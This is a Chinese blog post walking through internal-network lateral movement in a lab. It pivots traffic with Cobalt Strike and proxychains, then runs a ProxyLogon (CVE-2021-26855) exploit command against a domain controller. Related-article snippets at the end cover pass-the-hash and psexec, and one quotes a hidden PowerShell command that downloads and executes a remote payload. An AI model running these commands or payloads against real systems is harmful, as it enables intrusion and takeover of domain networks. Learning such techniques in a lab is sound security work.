cs和msf实现内网横向移动3

最新推荐文章于 2024-08-19 16:45:25 发布
最新推荐文章于 2024-08-19 16:45:25 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/121109942
版权
本文介绍了一种利用哈希攻击获取172.16.1.123权限的方法,并进一步通过该主机获取了域控制器172.16.1.119的权限。文中详细描述了使用proxychain进行流量代理的过程,以及利用微软自带的CVE-2021-26855漏洞获取目标系统权限的具体步骤。
摘要由CSDN通过智能技术生成

注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限

一、通过172.16.1.123确定172.16.1.119为域控

因为是靶机,所以知道了172.16.1.119为域控
在这里插入图片描述

二、通过proxychain代理流量进内网

因为vps无法直接访问到172.16.1.119,所以可以通过172.16.1.123生成一个代理端口来代理流量进入这个网段
1.下载proxychain
参考文章:https://blog.csdn.net/ITWANGBOIT/article/details/105738967
2.先在cs上开启一个代理端口
在这里插入图片描述
在这里插入图片描述
3.在vps上配置proxychain相关文件
vim /etc/proxychains.conf进入该配置文件
在最后一行加上相应的代理P和端口
在这里插入图片描述
在这里插入图片描述

三、通过微软自带漏洞getshell

1.扫描发现该靶机存在CVE-2021-26855漏洞
在这里插入图片描述
2.直接下载该漏洞对应的exp下载执行
在这里插入图片描述
3.将该exp上传VPS直接执行

在这里插入图片描述
执行命令
proxychains4 python proxylogon.py [目标IP] (用户名)@域名称
在这里插入图片描述
4.执行成功,获得权限
在这里插入图片描述

RCE11
关注
专栏目录
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1519
内网环境下的横向移动总结
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1653
横向移动】PsExec工具远程命令执行横向移动 文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
CS内网横向移动实验
Innocence_0的博客
01-29 961
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。**攻击者win10地址:**192.168.8.3。攻击者充当CS客户端连接。
使用csmsf进行内网横向移动
qq_46635165的博客
10-10 4897
使用csmsf进行内网横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内网 1, 将目标上线至CS 2, 使用cs探测内网信息 查看当前目标系统网络情况,确认目标系统所在内网网段 3, 使用cs的portscan功能对内网进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内网横向移动 对当前目标系统所获取
msf+proxychains组合搭建socks5隧道 | 内网穿透
最新发布
ULGANOY的博客
08-19 564
socks5隧道 | 内网穿透技术学习
CSMSF联动实现内网横向移动
wuxinweii的博客
10-21 1540
CSMSF联动实现内网横向移动 ** 实验要求:外网vps一台 cs服务器 msf工具 已经成功拿到shell** 一、使用cs生成EXE文件上传到目标主机直接上线 *1.先使用cs生成一个监听器来监听EXE连接回来的端口 主要配置payload类型和监听主机IP和端口 2.生成一个exe可执行文件 主要配置监听器和类型类型 3.将文件上传到目标直接执行 4.上线成功 二、扫描内网中的其他主机 1.使用cs的portcan模块来进行内网其他机器扫描 2.扫描完成后发现内网有很多主机,而这次的目标
csmsf实现内网横向移动2
wuxinweii的博客
10-28 860
一、使用CS的psexec实现哈希攻击 1.在扫描完内网其他主机后选择一台需要传递的主机 2.实验之前必须已经获得用户名的哈希值或明文密码 右键选择jump—>psexec功能 2.配置参数 选择一个用户名密码和参数,但必须与需要传递的主机信息一致 选择一个监听器和一个已经得到的session 3.执行命令查看结果 传递成功 上线成功 二、使用msf的psexec功能 如果cs一直无法传递,可以试试使用msf的psexec功能 1.配置进入内网路由(前面一篇文章有做法) 2.使用use exp
内网安全】搭建网络拓扑,CS内网横向移动实验
过期的秋刀鱼
11-29 1262
在谁身上,就是以谁的身份去访问,上一步已经把这个文件上传到了dmz,那么就可以以dmz的身份去访问域控的IIS服务。**DC server2008地址:**172.16.1.254。攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连接。**攻击者win10地址:**192.168.8.3。1、搭建CS服务器,CS客户端连接。攻击者充当CS客户端连接。利用哥斯拉上传CS木马。到dmz web服务端。
内网环境下的横向移动总结
hongduilanjun的博客
07-21 2730
前言在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3731
横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2290
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
安全科普】企业内网中的横向移动
小王的储物间
12-21 326
实际上,在横向移动攻击过程中,攻击者不仅可以运用相关技术与思路访问共享文件夹、凭证等敏感信息,也可以通过“横向移动”的方法渗透其它主机,窃取商业数据、财务信息等。除此以外,还能以域控主机为跳板,横向移动到其它域内主机,通过已获取的密码直接登录目标主机,执行远程命令,完成域内控制,进而以关键信息与权限为由,实施勒索行为。此时,黑客会在已控制的普通主机上查找与目标主机和环境相关的信息,获知目标主机开放的端口、存在的漏洞等,然后利用该漏洞渗透目标主机获取凭证,再使用哈希传递、黄金白银票据等方式进行登录。
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 1015
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 4391
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递三、SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
内网渗透—横向移动&IPC横移&Impacket套件&CS插件
2301_76227305的博客
07-31 952
以上便是IPC横移的知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
2024HW ---->内网横向移动
huohaowen的博客
04-21 1439
在蓝队的面试过程中,如果你会内网渗透的话,那是肯定的一个加分选项!!!那么从今天开始,我们就来讲一下内网横向移动!!!
cs内网横向的使用(靶机)
sweetie 的博客
11-02 1691
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
内网横向渗透神器-CS
qq_39756628的博客
06-22 2544
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
内网安全横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
今天是几号的博客
03-25 2024
简单使用ms14-058提权后,得到sysytem权限。IPC是专用管道,可以实现对远程计算机的访问, 需要使用目标系统用户的账号密码,使用139、445端口。 1. 建立IPC链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4. 删除IPC链接 常用ipc命令总结 net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator #新建连接 net
msf和frp内网穿透
08-19
虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现内网设备的访问。 Frp是一个高性能的反向代理工具,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值